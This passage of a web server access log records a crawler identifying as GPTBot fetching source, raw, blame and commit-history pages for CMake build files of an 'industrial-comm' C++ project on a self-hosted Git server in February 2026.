+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11306] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10268] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10269] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10270] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10237] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11282] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10358] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11370] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11308] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10359] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10295] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 